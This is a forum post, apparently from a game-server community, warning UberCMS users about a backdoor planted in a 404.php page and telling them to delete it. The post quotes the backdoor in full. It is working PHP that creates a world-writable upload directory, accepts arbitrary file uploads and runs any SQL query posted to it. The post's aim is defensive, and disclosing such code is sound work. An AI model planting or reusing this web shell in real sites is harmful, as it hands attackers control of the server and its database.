[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]
- Joined
- May 4, 2008
- Messages
- 831
- Reaction score
- 741
Here an important fix for UberCMS.
You really need to check your allseeingeye/pages and open the file 404.php.
if that file contains this code ->
Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....
Failure to do this will leave you open for a whole lot of trouble....
All credits for this go out to : [IP on request] for showing me this on our hotel.
Yes [IP on request] is a real cool hacker that likes to duck with peoples hard work. Good job dude...
If anybody wants his IP so they can block the dude from their site then ill be more than happy to provide it.
You really need to check your allseeingeye/pages and open the file 404.php.
if that file contains this code ->
PHP:
<?php
require_once "../../global.php";
require_once "../admincore.php";
if(!file_exists("god/"))
{
mkdir("god/", 0777);
echo 'Backdoor Directory Created : (god/)';
}
else
{
echo 'Backdoor Open for Uploading : (god/)';
}
if(isset($_POST['submit']))
{
$target_path = "god/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
if(isset($_POST['sql2']))
{
$core1225 = $_POST['sql1'];
mysql_query("".$core1225."");
echo 'Query Executed Successfully';
}
?>
<html>
<body>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
<input type="file" name="uploadedfile" id="file" />
<input type="submit" name="submit" value="Submit" />
<br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<p>
<label for="sql1"></label>
<textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
</p>
<p>
<input type="submit" name="sql2" id="sql2" value="Execute">
</p>
</form>
<p> </p>
</body>
Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....
Failure to do this will leave you open for a whole lot of trouble....
All credits for this go out to : [IP on request] for showing me this on our hotel.
Yes [IP on request] is a real cool hacker that likes to duck with peoples hard work. Good job dude...
If anybody wants his IP so they can block the dude from their site then ill be more than happy to provide it.
Last edited: